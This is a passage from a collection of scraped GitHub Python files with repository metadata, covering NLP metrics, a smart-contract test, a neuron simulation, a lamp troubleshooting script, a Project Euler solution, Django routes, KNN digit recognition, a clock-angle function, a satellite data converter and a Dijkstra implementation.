correct_indices = torch.eq(y_pred_indices, y_true).float()\n valid_indices = torch.ne(y_true, mask_index).float()\n \n n_correct = (correct_indices * valid_indices).sum().item()\n n_valid = valid_indices.sum().item()\n\n return n_correct / n_valid * 100\n\ndef compute_accuracy_tl(y_pred, y_true, x_source, mask_index):\n\n correct_indices = torch.eq(y_pred, y_true).float()\n valid_indices = torch.ne(x_source, mask_index).float()\n\n n_correct = (correct_indices * valid_indices).sum().item()\n n_valid = valid_indices.sum().item()\n\n return n_correct / n_valid * 100\n\n\ndef sequence_loss(y_pred, y_true, mask_index):\n y_pred, y_true = normalize_sizes(y_pred, y_true)\n return F.cross_entropy(y_pred, y_true, ignore_index=mask_index)\n\ndef compute_bleu_score(y_pred, y_true, weights=(0.25, 0.25, 0.25, 0.25)):\n return bleu_score.corpus_bleu(list_of_references=[[ref] for ref in y_true], \n hypotheses=y_pred, \n weights=weights,\n smoothing_function=bleu_score.SmoothingFunction().method1)","repo_name":"BlessingDev/NLP-Standard-Dialect-Transformation","sub_path":"metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22465442061","text":"from brownie import SimpleStorage, accounts\n\n\n# first test\ndef test_deploy():\n account = accounts[0]\n simple_storage = SimpleStorage.deploy({\"from\": account})\n starting_value = simple_storage.retrieve()\n expected = 0\n\n # assert\n assert expected == starting_value\n\n# When a test fails, run brownie test --pdb to drop into the console and inspect the results\n# Check the variables in the terminal\ndef test_update_storage():\n # arrange\n account = accounts[0]\n #print(account)\n # simple from account 0\n simple_storage = SimpleStorage.deploy({\"from\": account})\n\n #Act\n expected = 15\n simple_storage.store(expected, {\"from\": account })\n # Assert the result is 5 to see whether the test is correct\n assert 5 == simple_storage.retrieve()\n\ndef main():\n 
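# helper entry point that simply re-runs the deploy test\n 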
test_deploy()","repo_name":"huonghope/learn-blockchain2","sub_path":"freecode/brownie_simple_storage/tests/test_simple_storage.py","file_name":"test_simple_storage.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37508726367","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport gudhi as gd\nimport gudhi.representations\nfrom scipy.signal import find_peaks\n\ndt = 0.05\nt = np.linspace(0, 10, 10000)\n\n#constants\nmu = 4.5#7#put 7 when without noise\nc_m = 1.0 #microFarad\nv_Na = 50 #miliVolt\nv_K = -77 #miliVolt\nv_l = -54 #miliVolt\ng_Na = 120 #mScm-2\ng_K = 36 #mScm-2\ng_l = 0.03 #mScm-2\n\n#nonlinearities\nalpha_N = lambda v: 0.01 * (v + 50) / (1 - np.exp(- (v + 50) / 10))\nbeta_N = lambda v: 0.125 * np.exp(- (v + 60) / 80)\nalpha_M = lambda v: 0.1 * (v + 35) / (1 - np.exp(- (v + 35) / 10))\nbeta_M = lambda v: 4.0 * np.exp(- 0.0556 * (v + 60))\nalpha_H = lambda v: 0.07 * np.exp(- 0.05 * (v + 60))\nbeta_H = lambda v: 1 / (1 + np.exp(- (0.1) * (v + 30)))\n\n\nsqrtdt = np.sqrt(dt) #Euler-Maruyama\n\nneurons = np.empty([2, len(t)])\n#temporary = []\n#run multiple independent compartments\nfor k in range(0, 2):\n #intitial conditions:\n #state variables\n V = []\n M = []\n H = []\n N = []\n# temporary = []\n # temporary.append(mu)\n V.append(-60)\n M.append(alpha_M(V[0]) / (alpha_M(V[0]) + beta_M(V[0])))\n N.append(alpha_N(V[0]) / (alpha_N(V[0]) + beta_N(V[0])))\n H.append(alpha_H(V[0]) / (alpha_H(V[0]) + beta_H(V[0])))\n\n for i in range(1, len(t)):\n M.append(M[i-1] + dt * ((alpha_M(V[i-1]) * (1 - M[i-1])) - beta_M(V[i-1]) * M[i-1]))\n N.append(N[i-1] + dt * ((alpha_N(V[i-1]) * (1 - N[i-1])) - beta_N(V[i-1]) * N[i-1]))\n H.append(H[i-1] + dt * ((alpha_H(V[i-1]) * (1 - H[i-1])) - beta_H(V[i-1]) * H[i-1]))\n\n #additive current terms\n I_Na = g_Na * H[i-1] * M[i-1] ** 3 * (V[i-1] - v_Na)\n I_K = g_K * N[i-1] ** 4 * (V[i-1] - v_K)\n I_l = g_l * (V[i-1] - v_l) \n I_noise = sqrtdt * np.random.randn()\n #temporary.append(((1 / c_m) * (mu - (I_Na + I_K + I_l))))\n V.append(V[i-1] + (dt) * ((1 / c_m) * (mu - (I_Na + I_K + I_l))) + I_noise)\n \n neurons[k-1, :] = V\n\nprint(np.shape(neurons))\nprint(max(neurons[0,:]))\nprint(max(neurons[1,:]))\n\ntimesA = (neurons[0, :] > 41) * neurons[0, :]\ntimesB = (neurons[1, :] > 41) * neurons[1, :]\n\n#timesA2 = np.argwhere(neurons[0, :] > 41)\n#timesB2 = np.argwhere(neurons[1, :] > 41)\n\n#windowsA = np.empty([len(timesA2), 70])\n#for j in range(0, len(timesA2)):\n# print(timesA2[j][0])\n# leftEnd = timesA2[j][0] - 35\n# rightEnd = timesA2[j][0] + 35\n# print(np.shape(neurons[0, leftEnd:rightEnd]))# : timesA2[j][0]+35)\n# windowsA[j, :] = neurons[0, leftEnd:rightEnd]\n\n#windowsB = np.empty([len(timesB2), 70])\n#for j in range(0, len(timesB2)):\n# print(timesA2[j][0])\n# leftEnd = timesB2[j][0] - 35\n# rightEnd = timesB2[j][0] + 35\n# print(np.shape(neurons[0, leftEnd:rightEnd]))# : timesA2[j][0]+35)\n# windowsB[j, :] = neurons[1, leftEnd:rightEnd]\n#print(np.shape(windowsA))\n#print(len(timesA2))\n#print(np.shape(windowsB))\n#print(len(timesB2))\n\npeaksA, _ = find_peaks(neurons[0, :], prominence=40)\n#print(\"peaksA\")\n#print(len(peaksA))\n#print(peaksA)\npeaksB, _ = find_peaks(neurons[1, :], prominence=40)\n#print(\"peaksB\")\n#print(len(peaksB))\n#print(peaksB)\n\nwindowsA = np.empty([len(peaksA), 300])\nfor j in range(0, len(peaksA)):\n leftEnd = peaksA[j] - 20\n rightEnd = peaksA[j] + 280\n windowsA[j, :] = neurons[0, 
leftEnd:rightEnd]\n\nwindowsB = np.empty([len(peaksB), 300])\nfor j in range(0, len(peaksB)):\n leftEnd = peaksB[j] - 20\n rightEnd = peaksB[j] + 280\n windowsB[j, :] = neurons[1, leftEnd:rightEnd]\n \nprint(np.shape(windowsA))\nprint(len(peaksA))\nprint(np.shape(windowsB))\nprint(len(peaksB))\n\n\n\n\n\n\ntW = np.linspace(0, 10, 300)\nplt.figure(figsize=(9, 3))\n#plt.plot(tW, windowsA[0,:], 'r-',label='voltage')\nplt.plot(tW[::10], windowsA[0,::10], 'r-',label='voltage')\n\n#figN,figM = np.shape(windowsA)\n#for k in range(0,figN*figM):\n# plt.subplot(figN*figM, 1, k + 1)\n# plt.plot(tW[::10], windowsA[0,::10], 'r-',label='voltage')\n\n\n\nplt.figure(figsize=(9, 3))\nplt.subplot(4, 1, 1)\nplt.plot(t, timesA, 'g-',label='voltage')\nplt.subplot(4, 1, 2)\nplt.plot(t, neurons[0, :], 'b-',label='voltage')\nplt.subplot(4, 1, 3)\nplt.plot(t, timesB, 'g-',label='voltage')\nplt.subplot(4, 1, 4)\nplt.plot(t, neurons[1, :], 'b-',label='voltage')\n\nelectrode = np.empty([4, len(t)])\nelectrode[0, :] = -1.0 * neurons[0, :] + (-1.0) * neurons[1, :] / 2.0\nelectrode[1, :] = (-1.0/np.sqrt(2)) * neurons[0, :] + (-1.0/np.sqrt(2)) * neurons[1, :] / 2.0\nelectrode[2, :] = -0.5 * neurons[0, :] + -0.5 * neurons[1, :] / 2.0\nelectrode[3, :] = (-1.0/np.sqrt(5)) * neurons[0, :] + (-1.0/np.sqrt(5)) * neurons[1, :] / 2.0\n\nnumwinA, _ = np.shape(windowsA)\nnumwinB, _ = np.shape(windowsB)\n\nprint(numwinA)\nfieldA = np.empty([27000, numwinA])\n#for j in range(0, numwinA):\n# print(j)\nfor i in range(0, numwinA):\n# print (i)\n# print(windowsA[i,::10])\n V_x = -1.0 * windowsA[i,::10]\n V_y = (-1.0 / np.sqrt(2)) * windowsA[i, ::10]\n V_z = -0.5 * windowsA[i, ::10]\n V_w = (-1.0 / np.sqrt(5)) * windowsA[i, ::10]\n fieldA[:, i] = 0.5*(-1.0 * np.kron(np.kron(V_x, V_y), V_z) - 1.0 * np.kron(np.kron(V_y, V_z), V_w))\nprint(np.shape(fieldA))\n\nprint(numwinB)\nfieldB = np.empty([27000, numwinB])\n#for j in range(0, numwinA):\n# print(j)\nfor i in range(0, numwinB):\n# print (i)\n# print(windowsA[i,::10])\n V_x = -1.0 * windowsB[i,::10] / 2\n V_y = (-1.0 / np.sqrt(2)) * windowsB[i, ::10] / 2\n V_z = -0.5 * windowsB[i, ::10] / 2\n V_w = (-1.0 / np.sqrt(5)) * windowsB[i, ::10] / 2\n fieldB[:, i] = 0.5*(-1.0 * np.kron(np.kron(V_x, V_y), V_z) - 1.0 * np.kron(np.kron(V_y, V_z), V_w))\nprint(np.shape(fieldB))\n\nL_a = np.empty([numwinA, 5000])\nfor i in range(0, numwinA):\n cubical_complex = gd.CubicalComplex(\n dimensions=[30, 30, 30],\n top_dimensional_cells=fieldA[:, i],\n )\n diag = cubical_complex.persistence(homology_coeff_field=2, min_persistence=10)\n #gd.plot_persistence_diagram(diag)\n #print(cubical_complex.betti_numbers())\n\n LS = gd.representations.Landscape(resolution=1000)\n L_a[i, :] = LS.fit_transform([cubical_complex.persistence_intervals_in_dimension(2)])\n print(np.shape(L_a))\nL_hatA = np.mean(L_a, axis=0)\n\nL_b = np.empty([numwinB, 5000])\nfor i in range(0, numwinB):\n cubical_complex = gd.CubicalComplex(\n dimensions=[30, 30, 30],\n top_dimensional_cells=fieldB[:, i],\n )\n diag = cubical_complex.persistence(homology_coeff_field=2, min_persistence=10)\n #gd.plot_persistence_diagram(diag)\n #print(cubical_complex.betti_numbers())\n\n LS = gd.representations.Landscape(resolution=1000)\n L_b[i, :] = LS.fit_transform([cubical_complex.persistence_intervals_in_dimension(2)])\n print(np.shape(L_b))\nL_hatB = np.mean(L_b, axis=0)\n\n\n\n\nplt.figure(figsize=(9, 3))\nplt.subplot(2, 1, 
1)\nplt.plot(L_hatA[:1000])\nplt.plot(L_hatA[1000:2000])\nplt.plot(L_hatA[2000:3000])\nplt.plot(L_hatA[3000:4000])\nplt.plot(L_hatA[4000:5000])\nplt.title(\"Landscape\")\nplt.subplot(2, 1, 2)\nplt.plot(L_hatB[:1000])\nplt.plot(L_hatB[1000:2000])\nplt.plot(L_hatB[2000:3000])\nplt.plot(L_hatB[3000:4000])\nplt.plot(L_hatB[4000:5000])\nplt.title(\"Landscape\")\n\n\nplt.figure(figsize=(9, 3))\nplt.subplot(4, 1, 1)\nplt.plot(t, electrode[0, :], 'g-',label='voltage')\nplt.ylim(ymax = 110, ymin = -45)\nplt.subplot(4, 1, 2)\nplt.plot(t, electrode[1, :], 'g-',label='voltage')\nplt.ylim(ymax = 110, ymin = -45)\nplt.subplot(4, 1, 3)\nplt.plot(t, electrode[2, :], 'g-',label='voltage')\nplt.ylim(ymax = 110, ymin = -45)\nplt.subplot(4, 1, 4)\nplt.plot(t, electrode[3, :], 'g-',label='voltage')\nplt.ylim(ymax = 110, ymin = -45)\n#plt.plot(t, 0.0 - electrode[0, :] - 0.5*electrode[1, :]+ np.random.normal(-0.1, 0.1, 9).dot(electrode[2:11, :]), 'b-',label='voltage')\n#plt.plot(t, 0.0 - electrode[0, :] + 0.5*abs(np.random.normal(0, 0.1, 100)).dot(electrode[1:101, :]), 'b-',label='voltage')\n\nplt.show()","repo_name":"leonidfedorov/ephysim","sub_path":"HH.py","file_name":"HH.py","file_ext":"py","file_size_in_byte":7791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34933016396","text":"STEP_1 = False # step 1\nSHOWN_ONCE = False # disables welcome message after being shown once\nwhile True:\n while True:\n if not SHOWN_ONCE:\n print(' ')\n print(\"Welcome to: Do I Need To Fix My Lamp.\\n Please put yes or no: \")\n SHOWN_ONCE = True\n WORKING = input(\"Does your Lamp work? (Y/N): \")\n WORKING = WORKING.capitalize()\n if WORKING == 'Y':\n print(\"Great! Lamp is working.\")\n exit()\n if WORKING == \"N\":\n break\n else:\n print(\"Please put Y or N\")\n while True:\n PLUG = input(\"Is it plugged in? (Y/N): \")\n PLUG = PLUG.capitalize()\n if PLUG == 'N':\n print(\"Plug it in.\")\n STEP_1 = True\n break\n if PLUG == 'Y':\n break\n else:\n print(\"Please put Y or N\")\n if STEP_1:\n STEP_1 = False\n continue\n while True:\n BULB = input(\"Is bulb burned out? (Y/N): \")\n BULB = BULB.capitalize()\n if BULB == 'N':\n print(\"Repair Lamp.\")\n break\n if BULB == 'Y':\n BULB = True\n print(\"Replace your bulb.\")\n break\n else:\n print(\"Please put Y or N\")\n","repo_name":"TheRandomOwl/RandomPythonScripts","sub_path":"Lamp.py","file_name":"Lamp.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"434035404","text":"#You are given the following information, but you may prefer to do some research for yourself.\n#\n# 1 Jan 1900 was a Monday.\n#\n# Thirty days has September,\n# April, June and November.\n# All the rest have thirty-one,\n# Saving February alone,\n# Which has twenty-eight, rain or shine.\n# And on leap years, twenty-nine.\n# A leap year occurs on any year evenly divisible by 4, but not on a century unless it is divisible by 400.\n# \n# How many Sundays fell on the first of the month during the twentieth century (1 Jan 1901 to 31 Dec 2000)?\n\n# I'm thinking of the days encoded as Z mod 7 as follows:\n# 0\tsunday\n# 1\tmonday\n# 2 \ttuesday\n# 3\twednesday\n# 4\tthursday\n# 5 \tfriday\n# 6 \tsaturday\n\ndef get_day(date, month, year):\n day = 0 # We're starting with the fact that get_day(1,1,1900) = 1. We'll get 0 from the year 1900, 0 from the month january, and 1 from the date the 1st. 
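Quick check of the anchor date: get_day(1, 1, 1900) = (0 + 0 + 1) % 7 = 1, i.e. Monday, matching the fact quoted above.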
\n    # Year\n    day = (day + (year-1900) + max(year-1901, 0)//4)%7 \t# 365%7=1, so we add 1 for every year since 1900, plus 1 for each leap day completed before 1 Jan of this year (1904, 1908, ...). 1900 is not a leap year, and the current year's own leap day is added in the month section below. \n    # Month\n    if month > 1:\n        day += 31\n    if month > 2:\n        day += 28 \n        if year%4 == 0:\n            day += 1 #then it's a leap year\n        if year%100 == 0:\n            day -= 1 #actually it isn't\n        if year%400 == 0:\n            day += 1 #actually it is\n    if month > 3:\n        day += 31\n    if month > 4:\n        day += 30\n    if month > 5:\n        day += 31\n    if month > 6:\n        day += 30\n    if month > 7:\n        day += 31\n    if month > 8:\n        day += 31\n    if month > 9:\n        day += 30\n    if month > 10:\n        day += 31\n    if month > 11:\n        day += 30\n    # Day\n    day = (day + date) % 7\n    return day\n\n# Now we count Sundays which fall on the 1st of each month, over 1 Jan 1901 to 31 Dec 2000 as the problem asks:\n\ncount=0\n\nfor iyear in range(1901, 2001):\n    for imonth in range(1,13):\n        count += 1 if get_day(1,imonth,iyear) == 0 else 0\n        if get_day(1,imonth,iyear) == 0:\n            print(\"1-\" + str(imonth) + \"-\" + str(iyear))\n\nprint(count)\n","repo_name":"TrevorKlar/project_euler","sub_path":"problem19.py","file_name":"problem19.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}{"seq_id":"9407474591","text":"from django.urls import path\nfrom .api_views import api_list_customers, api_show_customers, api_list_salesperson, api_show_salesperson, api_list_salesrecords, api_show_salesrecords\n\nurlpatterns = [\n    path(\"customers/\", api_list_customers, name=\"api_create_customers\"),\n    path(\"customers//\", api_show_customers, name=\"api_show_customers\"),\n    path(\"salespersons/\", api_list_salesperson, name=\"api_create_salesperson\"),\n    path(\"salespersons//\", api_show_salesperson, name=\"api_show_salesperson\"),\n    path(\"salesrecords/\", api_list_salesrecords, name=\"api_create_salesrecords\"),\n    path(\"salesrecords//\", api_show_salesrecords, name=\"api_show_salesrecords\"),\n]","repo_name":"joki4127/CarCar","sub_path":"sales/api/sales_rest/api_urls.py","file_name":"api_urls.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}{"seq_id":"17855215247","text":"import cv2\r\nimport numpy as np\r\n\r\ndigits=cv2.imread(\"digits.png\",cv2.IMREAD_GRAYSCALE)\r\ntest_digits=cv2.imread(\"test_digits.png\",cv2.IMREAD_GRAYSCALE)\r\n\r\ntest_digits=np.vsplit(test_digits,50)\r\n\r\n#test digits \r\ntest_cells=[]\r\nfor d in test_digits:\r\n    d=d.flatten()\r\n    test_cells.append(d)\r\ntest_cells=np.array(test_cells,dtype=np.float32)\r\nrows=np.vsplit(digits,50)\r\n\r\n\r\n#putting all the elements in the array (50x50=2500 digits)\r\ncells=[]\r\n\r\nfor row in rows:\r\n    elem=np.hsplit(row,50)\r\n    for i in elem:\r\n        i=i.flatten()\r\n        cells.append(i)\r\n\r\n#convert to np array \r\ncells=np.array(cells,dtype=np.float32)\r\n\r\n#made to specify the first 250 are zeros and the next 250 are ones and so on\r\nk=np.arange(10)\r\ncells_labels=np.repeat(k,250)\r\n \r\n# loading KNN(K Nearest Neighbour Algo)\r\n\r\nknn=cv2.ml.KNearest_create()\r\nknn.train(cells,cv2.ml.ROW_SAMPLE,cells_labels)\r\n\r\nret,result,neighbours,dist=knn.findNearest(test_cells,k=3)\r\n\r\n#K value is the number of nearest neighbours that we need to find\r\n# K can be any 'odd' 
value\r\n\r\nprint(result)\r\n\r\n\r\n","repo_name":"moadmmh/Awesome-OpenCV","sub_path":"Hand_Written_digits_recognition/Knn_digits.py","file_name":"Knn_digits.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"5"}{"seq_id":"38122444400","text":"# Create a function that accepts an hour and a minute and returns the angle between the hour hand and the minute hand. \n\ndef calc_angle(hour: int, minute: int) -> int:\n    if (hour < 0 or hour > 12) or not isinstance(hour, int):\n        print(\"hour must be integer number between 0 and 12\")\n        return -1\n    if (minute < 0 or minute > 60) or not isinstance(minute, int):\n        print(\"minute must be integer number between 0 and 60\")\n        return -1\n    if hour == 12:\n        hour = 0\n    if minute == 60:\n        minute = 0\n        hour = (hour + 1) % 12\n    \n    minute_angle = 360 / 60 * minute\n    int_hour_angle = 360 / 12 * hour\n    fract_hour_angle = 360 / 12 / 60 * minute\n    hour_angle = int_hour_angle + fract_hour_angle\n    angle_between_hour_and_minute = abs(minute_angle - hour_angle)\n    \n    return int(angle_between_hour_and_minute)\n\n","repo_name":"itpen-bala/tasks","sub_path":"calculate_angle_between_hands_of_clock/calculate_angle_between_hands_of_clock.py","file_name":"calculate_angle_between_hands_of_clock.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}{"seq_id":"37722301512","text":"import argparse\nfrom datetime import datetime, time, timezone\nfrom os import environ\nfrom pathlib import Path\n\nimport h5py\nimport numpy as np\nimport xarray as xr\nfrom pyspex.lib.tmtc_def import tmtc_dtype\nfrom pyspex.lv1_gse import LV1gse\nfrom pyspex.lv1_io import L1Aio\nfrom pyspex.tif_io import TIFio\nfrom pyspex.version import pyspex_version\n\n# - global parameters ------------------------------\nEPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)\n\n\n# - local functions --------------------------------\ndef get_table_id(ckd_dir, bin_table_name):\n    \"\"\"Quick and dirty implementation to obtain table_id from binning-table CKD.\"\"\"\n    if not Path(ckd_dir).is_dir():\n        ckd_dir = environ.get('CKD_DIR', '.')\n\n    # only read the latest version of the binning-table CKD\n    bin_tables = sorted(list(Path(ckd_dir).glob('SPX1_OCAL_L1A_TBL_*.nc')))\n    if not bin_tables:\n        raise FileNotFoundError('No binning table found')\n\n    table_id = None\n    with h5py.File(bin_tables[-1], 'r') as fid:\n        for grp in [x for x in fid if x.startswith('Table')]:\n            gid = fid[grp]\n            if 'origin' not in gid.attrs:\n                continue\n\n            if gid.attrs['origin'].decode('ascii') == bin_table_name:\n                table_id = int(grp.split('_')[1])\n                break\n\n    return table_id\n\n\ndef get_stimulus(hdr):\n    \"\"\"Return stimulus data as a xarray::Dataset.\"\"\"\n    if 'Spectral data stimulus' not in hdr:\n        return None\n\n    ds_dict = hdr['Spectral data stimulus']\n    xr_wv = xr.DataArray(ds_dict['Wavelength (nm)'],\n                         coords=[ds_dict['Wavelength (nm)']],\n                         dims=['wavelength'],\n                         attrs={'long_name': 'wavelength of stimulus',\n                                'units': 'nm'})\n\n    data = ds_dict['Radiance (photons/(s.nm.m^2.sr)']\n    data *= 2.99792458 * 6.62607015e-14 / ds_dict['Wavelength (nm)']\n    xr_sign = xr.DataArray(data, dims=['wavelength'],\n                           coords=[ds_dict['Wavelength (nm)']],\n                           attrs={'long_name': 'signal of stimulus',\n                                  'units': 'W.m-2.sr-1.um-1'})\n\n    return xr.Dataset({'wavelength': xr_wv, 'signal': xr_sign})\n\n\ndef get_l1a_name(msm_id: str, utc_sensing_start: datetime) -> str:\n    \"\"\"\n    Return name of SPEXone product for DEM measurements.\n\n    
Parameters\n ----------\n msm_id : string, optional\n Provide identifier for measurement, OCAL only\n utc_sensing_start: datetime\n Provide sensing start of first measurement in L1A product\n\n Notes\n -----\n L1A file name format:\n SPX1_OCAL_[_YYYYMMDDTHHMMSS]_L1A_vvvvvvv.nc\n where\n msm_id is the measurement identifier\n YYYYMMDDTHHMMSS is time stamp of the first image in the file\n vvvvvvv is the git-hash string of the pyspex repository\n \"\"\"\n # define string of sensing start as yyyymmddThhmmss\n sensing_start = utc_sensing_start.strftime('%Y%m%dT%H%M%S')\n\n return (f'SPX1_OCAL_{msm_id}_{sensing_start}'\n f'_L1A_{pyspex_version(githash=True)}.nc')\n\n\n# - main function ----------------------------------\ndef main():\n \"\"\"Create a L1A calibration product from data in Tiff format.\n\n Environment\n -----------\n CKD_DIR : directory with SPEXone CKD, default is CWD\n \"\"\"\n parser = argparse.ArgumentParser(\n description='create SPEXone L1A product from instrument simulations')\n parser.add_argument('--lineskip', default=False, action='store_true',\n help='read line-skip data, when available')\n parser.add_argument('--output', default=None,\n help='define output directory, default=CWD')\n inp_grp = parser.add_argument_group('inp_grp', 'process inp_tif files')\n inp_grp.add_argument('--inp_tif', default=False, action='store_true',\n help='use TIFF file with 32-bit image')\n inp_grp.add_argument('--nframe', default=None, type=int,\n help='specify the number of images to be generated')\n parser.add_argument('--verbose', default=False, action='store_true',\n help='be verbose')\n parser.add_argument('ascii_file', default=None,\n help=('provide path to SPEXone instrument simulator'\n ' product with extension \".dat\"'))\n args = parser.parse_args()\n if args.verbose:\n print(args)\n\n if not Path(args.ascii_file).is_file():\n raise FileNotFoundError(f'File {args.ascii_file} does not exist')\n\n if not args.inp_tif and args.nframe is not None:\n raise RuntimeError('option --nframe works only with \"--inp_tif\"')\n\n tif = TIFio(args.ascii_file, inp_tif=args.inp_tif, lineskip=args.lineskip)\n hdr = tif.header()\n tags = tif.tags()[0]\n images = tif.images(n_frame=args.nframe)\n if args.verbose:\n for key, value in hdr.items():\n if key == 'Spectral data stimulus':\n continue\n print(f\"{key:s}: '{value}'\")\n\n # For now, we obtain the reference time from the TIFF.tags\n utc_start = None\n msm_id = hdr['OCAL measurement']\n for key in tags:\n if key.name == 'datetime':\n str_date, str_time = tags[key.value].split(' ')\n utc_start = datetime.fromisoformat(\n str_date.replace(':', '-') + 'T' + str_time + '+00:00')\n break\n\n prod_name = get_l1a_name(msm_id, utc_start)\n if args.inp_tif:\n prod_name = prod_name.replace('_L1A_', '_inp_L1A_')\n if args.output is not None:\n dest_dir = Path(args.output)\n if not dest_dir.is_dir():\n dest_dir.mkdir()\n prod_name = str(dest_dir / prod_name)\n if args.verbose:\n print(prod_name)\n\n # define dimensions for L1A product\n if args.inp_tif:\n if images.ndim == 2:\n n_images = 1\n n_samples = images.size\n else:\n n_images = images.shape[0]\n n_samples = images.shape[1] * images.shape[2]\n else:\n n_images = int(hdr['Number of measurements'])\n if args.lineskip:\n n_samples = (int(hdr['Enabled lines'])\n * int(hdr['Column dimension']))\n else:\n n_samples = (int(hdr['Row dimension'])\n * int(hdr['Column dimension']))\n\n dims = {'number_of_images': n_images,\n 'samples_per_image': n_samples,\n 'hk_packets': n_images,\n 'viewing_angles': 
int(hdr['Number of viewing angles'])}\n\n # define binning table ID\n if n_samples == 0x400000:\n table_id = 0\n elif n_samples == 0x100000:\n table_id = 1\n else:\n if args.lineskip:\n table_id = get_table_id('/nfs/SPEXone/share/ckd',\n hdr['Line-enable-array'])\n else:\n table_id = get_table_id('/nfs/SPEXone/share/ckd',\n hdr['Flexible binning table'])\n\n # Compute delta_time for each frame (seconds)\n # convert timestamps to seconds per day\n offs = (utc_start - EPOCH).total_seconds()\n intg_time = int(hdr['Co-additions']) * float(hdr['Exposure time (s)'])\n secnds = (1 + np.arange(n_images, dtype=float)) * intg_time\n img_sec = (offs + secnds // 1).astype('u4')\n img_subsec = np.round((secnds % 1) * 2**16).astype('u2')\n img_time = secnds\n\n nom_hk = np.zeros(n_images, dtype=tmtc_dtype(0x320))\n sci_hk = np.zeros(n_images, dtype=tmtc_dtype(0x350))\n if table_id == 0:\n sci_hk['REG_FULL_FRAME'] = 1\n sci_hk['REG_CMV_OUTPUTMODE'] = 3\n else:\n sci_hk['REG_FULL_FRAME'] = 2\n sci_hk['REG_CMV_OUTPUTMODE'] = 1\n sci_hk['REG_BINNING_TABLE_START'] = 0x400000 * (table_id + 1) + 0x80000000\n sci_hk['DET_OFFSET'] = 16384 - 70\n sci_hk['DET_FOTLEN'] = 20\n sci_hk['DET_EXPTIME'] = \\\n int(1e7 * float(hdr['Exposure time (s)']) / 129 - 0.43 * 20)\n sci_hk['REG_NCOADDFRAMES'] = int(hdr['Co-additions'])\n\n # Generate L1A product\n ref_date = datetime.combine(\n utc_start.date(), time(0), timezone.utc)\n with L1Aio(prod_name, dims=dims, ref_date=ref_date) as l1a:\n # write image data, detector telemetry and image attributes\n l1a.fill_science(images.reshape(n_images, -1),\n sci_hk, np.arange(n_images))\n\n l1a.set_dset('/image_attributes/icu_time_sec', img_sec)\n l1a.set_attr('valid_min', np.uint32(1577800000),\n ds_name='/image_attributes/icu_time_sec')\n l1a.set_attr('valid_max', np.uint32(1735700000),\n ds_name='/image_attributes/icu_time_sec')\n l1a.set_attr('units', 'seconds since 1970-01-01 00:00:00',\n ds_name='/image_attributes/icu_time_sec')\n l1a.set_dset('/image_attributes/icu_time_subsec', img_subsec)\n l1a.set_dset('/image_attributes/image_time', img_time)\n\n # Engineering data\n l1a.fill_nomhk(nom_hk)\n l1a.set_dset('/engineering_data/HK_tlm_time', img_time)\n\n # Global attributes\n l1a.fill_global_attrs(inflight=False)\n l1a.set_attr('input_files', [Path(args.ascii_file).name])\n\n with LV1gse(prod_name) as gse:\n gse.set_attr('origin', hdr['history'])\n gse.set_attr('comment', hdr['OCAL measurement'])\n if 'Light source' in hdr:\n gse.set_attr('light_source', hdr['Light source'])\n if 'Detector illumination' in hdr:\n gse.set_attr('Light_source', hdr['Detector illumination'])\n gse.set_attr('Illumination_level',\n float(hdr['Detect. 
illumination e/ms']))\n if 'Detector temperature (K)' in hdr:\n gse.set_attr('Detector_temperature',\n float(hdr['Detector temperature (K)']))\n if 'Detector temperature (K)' in hdr:\n gse.set_attr('Optics_temperature',\n float(hdr['Optics temperature (K)']))\n if 'Illuminated viewing angle' in hdr:\n vp_dict = {'0': 1, '1': 2, '2': 16, '3': 8, '4': 4}\n gse.write_viewport(vp_dict.get(hdr['Illuminated viewing angle']))\n else:\n gse.write_viewport(0)\n if 'Illuminated field ACT' in hdr:\n gse.write_attr_act(float(hdr['Rotation stage ACT angle']),\n float(hdr['Illuminated field ACT']))\n else:\n gse.write_attr_act(float(hdr['Rotation stage ACT angle']))\n if 'Illuminated field ALT' in hdr:\n gse.write_attr_alt(float(hdr['Rotation stage ALT angle']),\n float(hdr['Illuminated field ALT']))\n else:\n gse.write_attr_alt(float(hdr['Rotation stage ALT angle']))\n if 'DoLP input' in hdr:\n gse.write_attr_polarization(float(hdr['AoLP input (deg)']),\n float(hdr['DoLP input']))\n if 'Spectral data stimulus' in hdr \\\n and 'Illuminated viewing angle' in hdr:\n gse.write_data_stimulus(get_stimulus(hdr))\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","repo_name":"rmvanhees/pyspex","sub_path":"scripts/spx1_tif2l1a.py","file_name":"spx1_tif2l1a.py","file_ext":"py","file_size_in_byte":11141,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"73356768793","text":"import heapq\r\nfrom sqlitedict import SqliteDict\r\ndef dijkstra(adj, source, target):\r\n keys=[]\r\n for key in adj:\r\n keys.append(key)\r\n print(keys)\r\n INF = ((1<<63) - 1)//2\r\n pred = { x:x for x in adj }\r\n dist = { x:INF for x in adj }\r\n dist[source] = 0\r\n PQ = []\r\n heapq.heappush(PQ, [source,dist[source]])\r\n\r\n while(PQ):\r\n u = heapq.heappop(PQ) # u is a tuple [u_dist, u_id]\r\n u_dist = u[1]\r\n u_id = u[0]\r\n if u_dist == dist[u_id]:\r\n #if u_id == target:\r\n # break\r\n print(adj[u_id])\r\n for v in adj[u_id]:\r\n print(v in keys)\r\n if v in keys:\r\n v_id = v[0]\r\n w_uv = v[1]\r\n if dist[u_id] + w_uv < dist[v_id]:\r\n 